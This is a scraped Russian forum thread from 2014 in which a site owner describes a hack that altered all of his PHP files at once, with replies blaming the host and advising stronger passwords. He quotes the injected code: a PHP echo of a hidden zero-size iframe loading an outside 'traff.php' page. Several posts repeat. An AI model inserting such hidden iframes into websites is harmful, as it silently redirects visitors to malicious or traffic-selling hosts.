Добро пожаловать, Гость!
:: + Добавить ссылку через биллинг
:: + Добавить ссылку анонимно
❤️МИР, ЯРКИХ ЗНАКОМСТВ И ОБЩЕНИЯ!❤️
❤️МИР, ЯРКИХ ЗНАКОМСТВ И ОБЩЕНИЯ!❤️
Тема закрыта для обсуждения
Странный взлом - Страница 4
Архив закрытых тем | Странный взлом
Romka
:
Всем привет! Ребята вот такое произошло вчера:
Сижу в чате общаюсь на своем сайте и тут бац на сайте одни реоглефы!
Ну я сразу в ISP manager и сразу обратил внимание на то что ВСЕ php файлы изменены в одно время 22:55
вот скрин Ссылка и что самое интересное что у меня были там тестовые сайты и просто папки в WWW доменах и даже там все файлы изменены т.е не только на сайте!
я обнаружил что именно вставили во все файлы - вот такой код в самый низ файлов был вставлен: echo '<iframe src=http://www.kalogeizer.by/traff.php width=0 height=0></iframe>'; вот скрин Ссылка
Ребята что вы можете сказать по этому поводу? как такое можно было сделать за 1 минуту?
*Я все все при все файлы уже исправил,каждый файлик,папку просмотрел,шелов нет,сайт уже работает,но боюсь что повториться!
* мне недавно писали что хостинг на котором мой сайт расположен мол не безопасный!
Очень прошу кто понимает в чем дело отпишетесь!
Странный взлом
11 Июня 2014Всем привет! Ребята вот такое произошло вчера:
Сижу в чате общаюсь на своем сайте и тут бац на сайте одни реоглефы!
Ну я сразу в ISP manager и сразу обратил внимание на то что ВСЕ php файлы изменены в одно время 22:55
вот скрин Ссылка и что самое интересное что у меня были там тестовые сайты и просто папки в WWW доменах и даже там все файлы изменены т.е не только на сайте!
я обнаружил что именно вставили во все файлы - вот такой код в самый низ файлов был вставлен: echo '<iframe src=http://www.kalogeizer.by/traff.php width=0 height=0></iframe>'; вот скрин Ссылка
Ребята что вы можете сказать по этому поводу? как такое можно было сделать за 1 минуту?
*Я все все при все файлы уже исправил,каждый файлик,папку просмотрел,шелов нет,сайт уже работает,но боюсь что повториться!
* мне недавно писали что хостинг на котором мой сайт расположен мол не безопасный!
Очень прошу кто понимает в чем дело отпишетесь!
Комментарии:
Вика 28 Июня 2014
Наверно все таки что то с хостингом Я вчера сканировала сайт антивирусом 5 файлов кинула в карантин,были заряженны трояном и кому я мешаю))))
Наверно все таки что то с хостингом Я вчера сканировала сайт антивирусом 5 файлов кинула в карантин,были заряженны трояном и кому я мешаю))))
Hack 28 Июня 2014
Действительно такой ту*ой?
ISmile010, не дружище меня не могли поломать,то видно на хостинге один из администрации решил по умничать! перенес сайт я уже на другой хостинг и очень им доволен и скорость загрузки страниц хорошая и администрацию знаю не один год! вот мой совет: не ставьте сайты на не проверены хостинги!
Romka, а что за хостинг у тебя-то?ISmile010, не дружище меня не могли поломать,то видно на хостинге один из администрации решил по умничать! перенес сайт я уже на другой хостинг и очень им доволен и скорость загрузки страниц хорошая и администрацию знаю не один год! вот мой совет: не ставьте сайты на не проверены хостинги!
Действительно такой ту*ой?
Автор темы
ISmile010, не дружище меня не могли поломать,то видно на хостинге один из администрации решил по умничать! перенес сайт я уже на другой хостинг и очень им доволен и скорость загрузки страниц хорошая и администрацию знаю не один год! вот мой совет: не ставьте сайты на не проверены хостинги!
Автор темы
Hack 28 Июня 2014
Видимо на твоем хосте работало сразу несколько человек, ибо такая скорость не у всех есть.
Какой хостинг? Твой сайт я отлично знаю, он хорош.
У тебя нигде не посвилось сообщение внизу или вверху типа "Привет." или "Взлом!" ну что-то на подобие.
Ничего кроме иероглифов не замечал?
Зайди на bymas.ru/Инструметы/Генератор паролей и сделай себе пароль на 20 символов как у меня.
Тогда тебе ничего не страшно, но иногда взламывали меня и без хоста, где-то прописывая код который на всех страницах открывает только файл index.html
У тебя нигде не посвилось сообщение внизу или вверху типа "Привет." или "Взлом!" ну что-то на подобие.
Ничего кроме иероглифов не замечал?
Зайди на bymas.ru/Инструметы/Генератор паролей и сделай себе пароль на 20 символов как у меня.
Тогда тебе ничего не страшно, но иногда взламывали меня и без хоста, где-то прописывая код который на всех страницах открывает только файл index.html
Romka (28 Июня 2014):
в итоге как я понял это хостеры хотели вставить фрейм код но не вышло( криворукие) не верно поставили,но признавать не хотят-я не единый сайт на котором это произошло кто использовал тот хостинг!
Romka, По поводу файлов что все файлы были изменены или загружены в одно время!в итоге как я понял это хостеры хотели вставить фрейм код но не вышло( криворукие) не верно поставили,но признавать не хотят-я не единый сайт на котором это произошло кто использовал тот хостинг!
- Это возможно восстановили бэкап или перелили файлы.
Romka
28 Июня 2014
Автор темы
в итоге как я понял это хостеры хотели вставить фрейм код но не вышло( криворукие) не верно поставили,но признавать не хотят-я не единый сайт на котором это произошло кто использовал тот хостинг!
Автор темы